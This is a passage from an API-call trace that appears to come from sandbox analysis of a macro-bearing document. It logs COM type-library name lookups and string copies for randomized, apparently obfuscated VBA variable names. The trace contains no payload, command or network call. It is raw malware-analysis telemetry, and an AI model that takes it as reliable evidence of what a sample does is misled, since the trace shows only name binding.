szNameBuf="fAAQwA", lHashVal=0x102059, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.942] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.942] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.942] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="fAAQwA", lHashVal=0x102059, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.942] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.942] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.942] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="fAAQwA", lHashVal=0x102059, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.942] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61936, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="fAAQwA") returned 7 [0068.942] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="fAAQwA", lHashVal=0x102059, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.942] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.942] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61936 | out: _Dst=0x67c2d40) returned 0x0 [0068.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_fAAQwA") returned 0x109b02 [0068.942] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_fAAQwA" | out: _Dst="_B_var_fAAQwA") returned 0x0 [0068.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_fAAQwA") returned 14 [0068.942] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.942] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_fAAQwA", lHashVal=0x109b02, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.942] IUnknown:Release (This=0x665ba50) returned 0xd [0068.942] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.942] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_fAAQwA", lHashVal=0x109b02, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.942] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.942] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.942] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_fAAQwA", lHashVal=0x109b02, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.942] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.942] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.942] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_fAAQwA", lHashVal=0x109b02, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.943] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.943] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.943] IUnknown:Release (This=0x665ba50) returned 0xd [0068.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1046e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_fAAQwA") returned 14 [0068.943] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_fAAQwA", lHashVal=0x109b02, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x77005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x77005100000000, pDummy=0x0) returned 0x0 [0068.943] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61936 | out: _Dst=0x144ec0) returned 0x0 [0068.943] ITypeComp:RemoteBind (in: This=0x665ba60, szName="OooocAAU", lHashVal=0x109feb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6195e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="OooocAAU") returned 9 [0068.943] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="OooocAAU", lHashVal=0x109feb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6195e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="OooocAAU") returned 9 [0068.943] ITypeComp:RemoteBind (in: This=0x665bd30, szName="OooocAAU", lHashVal=0x109feb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OooocAAU") returned 0x109feb [0068.943] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="OooocAAU" | out: _Dst="OooocAAU") returned 0x0 [0068.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="OooocAAU") returned 9 [0068.943] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.943] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="OooocAAU", lHashVal=0x109feb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.943] IUnknown:Release (This=0x665ba50) returned 0xd [0068.943] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.943] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="OooocAAU", lHashVal=0x109feb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.943] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.943] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.943] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="OooocAAU", lHashVal=0x109feb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.943] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.943] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.944] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="OooocAAU", lHashVal=0x109feb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.944] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6195e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="OooocAAU") returned 9 [0068.944] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="OooocAAU", lHashVal=0x109feb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.944] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.944] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a6195e | out: _Dst=0x67c2d40) returned 0x0 [0068.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_OooocAAU") returned 0x107774 [0068.944] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_OooocAAU" | out: _Dst="_B_var_OooocAAU") returned 0x0 [0068.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_OooocAAU") returned 16 [0068.944] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.944] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_OooocAAU", lHashVal=0x107774, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.944] IUnknown:Release (This=0x665ba50) returned 0xd [0068.944] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.944] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_OooocAAU", lHashVal=0x107774, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.944] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.944] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.944] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_OooocAAU", lHashVal=0x107774, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.944] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.944] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.944] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_OooocAAU", lHashVal=0x107774, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.944] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.944] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.944] IUnknown:Release (This=0x665ba50) returned 0xd [0068.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1049e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_OooocAAU") returned 16 [0068.944] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_OooocAAU", lHashVal=0x107774, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x63006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x63006f00000000, pDummy=0x0) returned 0x0 [0068.944] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a6195e | out: _Dst=0x144ec0) returned 0x0 [0068.945] ITypeComp:RemoteBind (in: This=0x665ba60, szName="XA_cAox", lHashVal=0x10cdc0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a619b2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="XA_cAox") returned 8 [0068.945] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="XA_cAox", lHashVal=0x10cdc0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a619b2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="XA_cAox") returned 8 [0068.945] ITypeComp:RemoteBind (in: This=0x665bd30, szName="XA_cAox", lHashVal=0x10cdc0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XA_cAox") returned 0x10cdc0 [0068.945] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="XA_cAox" | out: _Dst="XA_cAox") returned 0x0 [0068.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="XA_cAox") returned 8 [0068.945] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.945] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="XA_cAox", lHashVal=0x10cdc0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.945] IUnknown:Release (This=0x665ba50) returned 0xd [0068.945] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.945] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="XA_cAox", lHashVal=0x10cdc0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.945] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.945] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.945] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="XA_cAox", lHashVal=0x10cdc0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.945] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.945] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.945] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="XA_cAox", lHashVal=0x10cdc0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.945] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a619b2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="XA_cAox") returned 8 [0068.945] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="XA_cAox", lHashVal=0x10cdc0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.945] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.945] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a619b2 | out: _Dst=0x67c2d40) returned 0x0 [0068.946] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_XA_cAox") returned 0x10d144 [0068.946] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_XA_cAox" | out: _Dst="_B_var_XA_cAox") returned 0x0 [0068.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_XA_cAox") returned 15 [0068.946] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.946] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_XA_cAox", lHashVal=0x10d144, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.946] IUnknown:Release (This=0x665ba50) returned 0xd [0068.946] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.946] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_XA_cAox", lHashVal=0x10d144, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.946] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.946] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.946] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_XA_cAox", lHashVal=0x10d144, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.946] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.946] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.946] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_XA_cAox", lHashVal=0x10d144, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.946] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.946] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.946] IUnknown:Release (This=0x665ba50) returned 0xd [0068.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b104ce, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_XA_cAox") returned 15 [0068.946] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_XA_cAox", lHashVal=0x10d144, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0) returned 0x0 [0068.946] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a619b2 | out: _Dst=0x144ec0) returned 0x0 [0068.946] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lZAGAAQ", lHashVal=0x101294, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6198a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lZAGAAQ") returned 8 [0068.946] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lZAGAAQ", lHashVal=0x101294, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6198a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lZAGAAQ") returned 8 [0068.946] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lZAGAAQ", lHashVal=0x101294, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lZAGAAQ") returned 0x101294 [0068.947] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="lZAGAAQ" | out: _Dst="lZAGAAQ") returned 0x0 [0068.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="lZAGAAQ") returned 8 [0068.947] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.947] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lZAGAAQ", lHashVal=0x101294, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.947] IUnknown:Release (This=0x665ba50) returned 0xd [0068.947] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.947] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lZAGAAQ", lHashVal=0x101294, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.947] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.947] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.947] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lZAGAAQ", lHashVal=0x101294, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.947] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.947] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.947] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lZAGAAQ", lHashVal=0x101294, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.947] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6198a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lZAGAAQ") returned 8 [0068.947] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lZAGAAQ", lHashVal=0x101294, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.947] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.947] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6198a | out: _Dst=0x67c2d40) returned 0x0 [0068.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lZAGAAQ") returned 0x100697 [0068.947] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_lZAGAAQ" | out: _Dst="_B_var_lZAGAAQ") returned 0x0 [0068.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_lZAGAAQ") returned 15 [0068.947] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.947] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lZAGAAQ", lHashVal=0x100697, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.947] IUnknown:Release (This=0x665ba50) returned 0xd [0068.947] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.947] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lZAGAAQ", lHashVal=0x100697, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.948] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.948] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.948] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lZAGAAQ", lHashVal=0x100697, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.948] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.948] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.948] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lZAGAAQ", lHashVal=0x100697, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.948] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.948] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.948] IUnknown:Release (This=0x665ba50) returned 0xd [0068.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b104fe, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_lZAGAAQ") returned 15 [0068.948] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lZAGAAQ", lHashVal=0x100697, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0) returned 0x0 [0068.948] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6198a | out: _Dst=0x144ec0) returned 0x0 [0068.948] ITypeComp:RemoteBind (in: This=0x665ba60, szName="r_AAAAA", lHashVal=0x105103, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61a06, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="r_AAAAA") returned 8 [0068.948] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="r_AAAAA", lHashVal=0x105103, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 